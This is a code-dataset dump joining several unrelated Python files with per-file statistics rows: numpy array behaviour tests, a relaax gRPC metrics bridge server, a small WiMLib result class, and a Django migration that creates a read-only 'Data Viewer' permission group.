def test_arange_slice_2A(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
b = a[:,:, np.where(a > 20)]
print("B")
print(b)
print(b.shape)
print(b.strides)
def test_arange_slice_2B(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
b = np.arange(100, 132, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
b[:,:,[2]] = a[:,:,[2]]
print("B")
print(b)
print(b.shape)
print(b.strides)
def test_arange_slice_2C(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
b = np.arange(100, 132, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
b[:,:,[2]] |= a[:,:,[2]]
print("B")
print(b)
print(b.shape)
print(b.strides)
def test_arange_slice_2C2(self):
a = np.arange(0, 32, dtype=np.int16).reshape(2,4, -1)
b = np.arange(100, 132, dtype=np.int16).reshape(2,4, -1)
print("A")
#print(a)
print(a.shape)
print(a.strides)
# b has unexpected strides. If a copy from A is made first
aarray = a[:, :, [2]]
barray = b[:, :, [2]]
carray = barray | aarray
print("B")
print(carray)
print(carray.shape)
print(carray.strides)
def test_ndarray_NAN(self):
_max = 5
output = np.ndarray(shape=(_max,), dtype = np.float);
output[:] = np.NaN;
print(output)
print(output.shape)
def test_insert_1(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.insert(a, 1, 5);
c = np.insert(a, 0, [999,100,101])
print(a)
print(a.shape)
print("B")
print(b)
print(b.shape)
print(b.strides)
print("C")
print(c)
print(c.shape)
print(c.strides)
def test_insert_2(self):
#print(np.source(np.insert))
a = np.array([1, 1, 2, 2, 3, 3])
b = np.array([90, 91, 92, 92, 93, 93])
c = np.insert(a, slice(None), b);
#d = nptest.insert(a, slice(None), b);
print(a)
print(a.shape)
print("B")
print(b)
print(b.shape)
print(b.strides)
print("C")
print(c)
print(c.shape)
print(c.strides)
#print(d)
#print(d.shape)
def test_append_1(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.append(a, 1);
print(a)
print(a.shape)
print(b)
print(b.shape)
print(b.strides)
def test_append_2(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.append(a, [4,4]);
print(a)
print(a.shape)
print(b)
print(b.shape)
print(b.strides)
def test_append_3(self):
a = np.array([[1, 1], [2, 2], [3, 3]])
b = np.array([[4, 4], [5, 5], [6, 6]])
c = np.append(a, b);
print(a)
print(a.shape)
print(b)
print(b.shape)
print(c)
print(c.shape)
print(c.strides)
def test_append_4(self):
a = np.array([1, 1, 2, 2, 3, 3]).reshape(2,-1)
b = np.array([4, 4, 5, 5, 6, 6]).reshape(2,-1)
c = np.append(a, b, axis=1)
print(a)
print(a.shape)
print("")
print(b)
print(b.shape)
print("")
print(c)
print(c.shape)
print(c.strides)
print("")
def test_append_msever_1(self):
arr = np.array([[1,2,3],[4,5,6]])
row = np.array([7,8,9])
arr = np.append(arr,[row],axis= 0)
print(arr)
def test_tuple_msever_2(self):
a = np.array((1,2,3))
print(a)
b = np.array((2,3,4))
print(b)
c = np.column_stack((a,b))
print(c)
def test_slice_msever_1(self):
a=np.array([[1,3,0],[0,0,5]])
col1 = a[:,0]
col2 = a[:,1]
col3 = a[:,2]
print(col1)
print(col2)
print(col3)
def test_hsplit_msever_1(self):
a=np.array([[1,3,0],[0,0,5]])
row, col = np.hsplit(np.argwhere(a),2)
print(row)
print(col)
def test_take_msever_1(self):
testVector = np.array([ 1.011163, 1.01644999999999, 1.01220500000001, 1.01843699999999, 1.00985100000001, 1.018964, 1.005825, 1.016707, 8.11556899999999, 1.010744, 1.01700600000001, 1.01323099999999, 1.010389, 1.015216, 1.015418, 1.01704600000001, 1.01191, 1.01164299999999, 1.01062400000001, 1.014199, 1.012952, 1.017645, 1.01591999999999, 1.018655, 1.00942400000001, 1.012852, 1.010543, 1.02000700000001, 1.008196, 1.01396099999999 ]);
testVector2 = testVector.reshape(15, 2);
testDataMode1 = np.array([ 1, 2, 2, 3, 4, 7, 9 ]);
print(testVector2);
print(testDataMode1);
print("np.take()");
testTake = np.take(testVector2, testDataMode1.astype(np.intp), axis=0);
print(testTake);
testVector3 = np.arange(0.0, 30000.0, 0.5, dtype= np.float64);
testVector4 = testVector3.reshape(30000, 2);
testIndex = np.arange(0, 30000, 100, dtype= np.intp);
print("test BIG np.take()");
# testBigTake = np.take(testVector4, testIndex, axis: 0);
testBigTake = np.zeros((300, 2), dtype= np.float64);
testBigTake = np.take(testVector4, testIndex, axis= 0);
print(testIndex);
print(testBigTake);
print(np.diff(testIndex));
print(np.diff(testBigTake, axis= 0));
def test_flat_1(self):
x = np.arange(10, 16).reshape(2,3);
print(x)
x.flat[3] = 9
print(x)
print(x.shape)
print(x.strides)
z = x.flat[3]
print(z)
print("")
print("indexes")
print("")
for zz in x.flat:
print(zz);
def test_flat_2(self):
x = np.arange(1, 7).reshape(2, 3)
print(x)
print(x.flat[3])
print(x.T)
print(x.T.flat[3])
x.flat = 3
print(x)
x.flat[[1,4]] = 1
print(x)
def test_intersect1d_1(self):
a = np.array([ 1, 3, 4, 3 ])
b = np.array([ 3, 1, 2, 1 ])
c = np.intersect1d(a,b)
print(c)
def test_setxor1d_1(self):
a = np.array([1, 2, 3, 2, 4])
b = np.array([2, 3, 5, 7, 5])
c = np.setxor1d(a,b)
print(c)
def test_in1d_1(self):
test = np.array([0, 1, 2, 5, 0])
states = [0, 2]
mask = nptest.in1d(test, states)
print(mask)
print(test[mask])
mask = np.in1d(test, states, invert=True)
print(mask)
print(test[mask])
def test_isin_1(self):
element = 2*np.arange(4).reshape((2, 2));
print(element)
test_elements = [1, 2, 4, 8]
mask = np.isin(element, test_elements)
print(mask)
print(element[mask])
print("***********")
mask = np.isin(element, test_elements, invert=True)
print(mask)
print(element[mask])
def test_union1d_1(self):
a = np.union1d([-1, 0, 1], [-2, 0, 2])
print(a)
def test_Ellipsis_indexing_1(self):
a = np.array([10.0, 7, 4, 3, 2, 1])
b = a[..., -1]
print(b)
print("********")
a = np.array([[10.0, 7, 4], [3, 2, 1]])
c = a[..., -1]
print(c)
print("********")
TestData = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 ]
a = np.array(TestData, dtype= np.uint32).reshape((1, 3, 2, -1, 1));
d = a[..., -1]
print(d)
print("********")
e = a[0, ..., -1]
print(e)
print("********")
f = a[0, :,:,:, -1]
print(f)
print("********")
g = a[0, 1, ..., -1]
print(g)
print("********")
h = a[0, 2, 1, ..., -1]
print(h)
print("********")
i = a[:, 2, 1, 1, ...]
print(i)
def test_concatenate_1(self):
a = np.array([[1, 2], [3, 4]])
b = np.array([[5, 6]])
c = np.concatenate((a, b), axis=0)
print(c)
d = np.concatenate((a, b.T), axis=1)
print(d)
e = np.concatenate((a, b), axis=None)
print(e)
f = np.concatenate((np.eye(2), np.ones((2, 2))), axis = 0)
print(f)
g = np.concatenate((np.eye(2), np.ones((2, 2))), axis = 1)
print(g)
def test_concatenate_2(self):
#a = np.array([1, 2, 3, 4, 5,6])
#c = np.concatenate(a, axis=0)
#d = np.concatenate((a), axis=0)
#print(a.shape)
#print(c.shape)
#print(d.shape)
#print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]])
c = np.concatenate(a, axis=0)
d = np.concatenate((a), axis=0);
print(a.shape)
print(c.shape)
print(d.shape)
print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]]).reshape((2,3,1,1))
c = np.concatenate(a, axis=0)
d = np.concatenate((a[0], a[1]), axis=0)
print(a.shape)
print(c.shape)
print(d.shape)
print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]])
c = np.concatenate(a, axis=1)
d = np.concatenate((a[0]), axis=0);
print(a.shape)
print(c.shape)
print(d.shape)
print("**********")
a = np.array([[[[1, 2], [3, 4], [5,6]]]]).reshape((3,2,1,1))
c = np.concatenate(a, axis=1)
d = np.concatenate((a[0], a[1], a[2]), axis=1)
print(a.shape)
print(c.shape)
print(d.shape)
#d = np.concatenate(a, axis=1)
#print(d)
#e = np.concatenate(a, axis=None)
#print(e)
def test_concatenate_3(self):
a = np.array([[[[1, 2], [3, 4], [5,6]]]])
c = np.concatenate(a, axis=-1)
print(c)
d = np.concatenate(a, axis=-2)
print(d)
c = np.concatenate((a,a,a), axis=-1)
print(c)
d = np.concatenate((a,a,a), axis=-2)
print(d)
def test_newaxis_ufunc_1(self):
x = np.arange(0, 4, 1, float)
y = x.reshape(4,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(4,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(4,1,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,4,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,4,1, 1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
def test_newaxis_ufunc_2(self):
x = np.arange(0, 4, 1, dtype=np.float32).reshape(2,2);
y = x.reshape(2,2,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(2,2,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(2,2,1,1,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,2,2,1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
y = x.reshape(1,2,2,1, 1) * 4
z = x + y
print(z.shape)
print(z)
print("*************")
def test_newaxis_ufunc_3(self):
x1 = np.array([1, 2, 3, 4, 5])
x2 = np.array([5, 4, 3])
x1_new = x1[:, np.newaxis]
z = x1_new + x2
print(z)
print("*************")
x1_new = x1[np.newaxis,:, np.newaxis]
z = x1_new + x2
print(z)
print("*************")
x2_new = x2[:, np.newaxis]
z = x1 + x2_new
print(z)
print("*************")
x2_new = x2[:, np.newaxis, np.newaxis]
z = x1 + x2_new
print(z)
def test_newaxis_ufunc_4(self):
x1 = np.array([1, 2, 3, 4, 5])
x2 = np.array([5, 4, 3])
x2_new = x2[:, np.newaxis]
z = x2_new + x1
print(z)
print("*************")
x2_new = x2[np.newaxis,:, np.newaxis]
z = x2_new + x1
print(z)
print("*************")
x2_new = x2[:, np.newaxis]
z = x2_new + x1
print(z)
print("*************")
x2_new = x2[:, np.newaxis, np.newaxis]
z = x2_new + x1
print(z)
def test_fields_1(self):
data = np.zeros(4, dtype={'names':('name', 'age', 'weight'),'formats':('U10', 'i4', 'f8')})
print(data.dtype)
if __name__ == '__main__':
unittest.main()
| 22.02111 | 445 | 0.47449 | 4,116 | 28,165 | 3.188533 | 0.079446 | 0.040232 | 0.018668 | 0.026516 | 0.666032 | 0.596007 | 0.552728 | 0.52263 | 0.487732 | 0.461292 | 0 | 0.087215 | 0.342127 | 28,165 | 1,279 | 446 | 22.02111 | 0.62108 | 0.027694 | 0 | 0.582686 | 0 | 0 | 0.042159 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0899 | false | 0 | 0.006659 | 0 | 0.097669 | 0.54495 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
6c17ef0176e106352590096d7278e535b50ea838 | 1,016 | py | Python | relaax/server/common/bridge/metrics_bridge_server.py | deeplearninc/relaax | a0cf280486dc74dca3857c85ec0e4c34e88d6b2b | [
"MIT"
] | 71 | 2017-01-25T00:26:20.000Z | 2021-02-17T12:39:20.000Z | relaax/server/common/bridge/metrics_bridge_server.py | deeplearninc/relaax | a0cf280486dc74dca3857c85ec0e4c34e88d6b2b | [
"MIT"
] | 69 | 2017-01-23T19:29:23.000Z | 2018-08-21T13:26:39.000Z | relaax/server/common/bridge/metrics_bridge_server.py | deeplearninc/relaax | a0cf280486dc74dca3857c85ec0e4c34e88d6b2b | [
"MIT"
] | 13 | 2017-01-23T21:18:09.000Z | 2019-01-29T23:48:30.000Z | from __future__ import absolute_import
from builtins import object
import concurrent
import grpc
from . import bridge_pb2
from . import bridge_message
class MetricsBridgeServer(object):
def __init__(self, bind, metrics_server):
self.server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=1))
bridge_pb2.add_BridgeServicer_to_server(Servicer(metrics_server), self.server)
self.server.add_insecure_port('%s:%d' % bind)
def start(self):
self.server.start()
class Servicer(bridge_pb2.BridgeServicer):
def __init__(self, metrics_server):
self.metrics_server = metrics_server
def SetX(self, request, context):
self.metrics_server.set_x(request.x)
return bridge_pb2.NullMessage()
def StoreMetric(self, request_iterator, context):
data = bridge_message.BridgeMessage.deserialize(request_iterator)
getattr(self.metrics_server.metrics, data['method'])(**data['kwargs'])
return bridge_pb2.NullMessage()
| 31.75 | 87 | 0.73622 | 122 | 1,016 | 5.836066 | 0.393443 | 0.127809 | 0.095506 | 0.064607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007101 | 0.168307 | 1,016 | 31 | 88 | 32.774194 | 0.835503 | 0 | 0 | 0.086957 | 0 | 0 | 0.016732 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.26087 | 0 | 0.652174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c19350eb655afa6ac646081689cf640b03c440f | 846 | py | Python | WIMLib/Resources/Result.py | jknewson/WiMLib | f9f74b29ed1dfc901b31e3df81f9f2459918dc4e | [
"CC0-1.0",
"MIT"
] | null | null | null | WIMLib/Resources/Result.py | jknewson/WiMLib | f9f74b29ed1dfc901b31e3df81f9f2459918dc4e | [
"CC0-1.0",
"MIT"
] | 1 | 2018-07-26T15:06:31.000Z | 2018-07-26T15:06:31.000Z | WIMLib/Resources/Result.py | jknewson/WiMLib | f9f74b29ed1dfc901b31e3df81f9f2459918dc4e | [
"CC0-1.0",
"MIT"
] | 1 | 2022-01-11T14:52:52.000Z | 2022-01-11T14:52:52.000Z | #------------------------------------------------------------------------------
#----- Result.py --------------------------------------------------------------
#------------------------------------------------------------------------------
#
# copyright: 2016 WiM - USGS
#
# authors: Jeremy K. Newson - USGS Web Informatics and Mapping (WiM)
#
# purpose: Data holder code
#
# usage: THIS SECTION NEEDS TO BE UPDATED
#
# discussion: THIS SECTION NEEDS TO BE UPDATED
#
# dates: 01 DEC 2016 jkn - Created / Date notation edited by jw
#
#------------------------------------------------------------------------------
#region "Imports"
import json
#endregion
class Result(object):
def __init__(self,identifier,descr = ""):
self.ID = identifier
self.Description = descr
self.Values = {} | 32.538462 | 79 | 0.401891 | 66 | 846 | 5.090909 | 0.772727 | 0.065476 | 0.095238 | 0.107143 | 0.160714 | 0.160714 | 0 | 0 | 0 | 0 | 0 | 0.014388 | 0.178487 | 846 | 26 | 80 | 32.538462 | 0.469065 | 0.757683 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c1e76ff354ea7d48556e2b24380b9a671a44043 | 2,576 | py | Python | mep/common/migrations/0007_add_data_viewer_group.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | 3 | 2020-05-12T19:19:41.000Z | 2021-04-07T13:56:32.000Z | mep/common/migrations/0007_add_data_viewer_group.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | 736 | 2017-06-21T16:24:42.000Z | 2022-02-26T17:46:10.000Z | mep/common/migrations/0007_add_data_viewer_group.py | making-books-ren-today/test_eval_3_shxco | 5a6427abeb4aec1aa70c0d9a4b32d028012780c8 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.2.11 on 2020-03-11 18:30
from django.contrib.auth.management import create_permissions
from django.db import migrations
data_viewer_perms = {
'accounts': [
'view_account',
"view_address",
'view_accountaddress',
'view_borrow',
'view_event',
'view_purchase',
'view_reimbursement',
'view_subscription',
'view_subscriptiontype'
],
'books': [
'view_publisher',
'view_publisherplace',
'view_creator',
'view_creatortype',
'view_work',
'view_edition',
'view_editioncreator',
],
'footnotes': [
'view_bibliography',
'view_footnote',
'view_sourcetype'
],
'people': [
'view_country',
'view_infourl',
'view_person',
'view_profession',
'view_relationship',
'view_relationshiptype'
],
'djiffy': [
'view_manifest',
'view_canvas',
]
}
def create_data_viewer_group(apps, schema_editor):
Group = apps.get_model('auth', 'Group')
Permission = apps.get_model('auth', 'Permission')
# make sure permissions are created before loading the fixture
# which references them
# (when running migrations all at once, permissions may not yet exist)
for app_config in apps.get_app_configs():
app_config.models_module = True
create_permissions(app_config, apps=apps, verbosity=0)
app_config.models_module = None
data_viewer, created = Group.objects.get_or_create(name='Data Viewer')
permissions = []
for app_name, codenames in data_viewer_perms.items():
# using explicit get so that there will be an error if an
# expected permission is not found
for codename in codenames:
# NOTE: djiffy permissions exist twice, since the app
# previously defined its own view permissions
perms = Permission.objects.filter(
codename=codename, content_type__app_label=app_name)
permissions.extend(perms)
data_viewer.permissions.set(permissions)
def remove_data_viewer_group(apps, schema_editor):
Group = apps.get_model('auth', 'Group')
Group.objects.filter(name='Data Viewer').delete()
class Migration(migrations.Migration):
dependencies = [
('common', '0006_update_content_editor_perms_works_and_djiffy'),
]
operations = [
migrations.RunPython(create_data_viewer_group,
reverse_code=remove_data_viewer_group)
]
| 28.94382 | 74 | 0.638587 | 280 | 2,576 | 5.603571 | 0.5 | 0.063735 | 0.038241 | 0.030593 | 0.072658 | 0.072658 | 0.072658 | 0.072658 | 0.072658 | 0.072658 | 0 | 0.011099 | 0.265528 | 2,576 | 88 | 75 | 29.272727 | 0.818182 | 0.14868 | 0 | 0.089552 | 1 | 0 | 0.244505 | 0.041667 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.029851 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.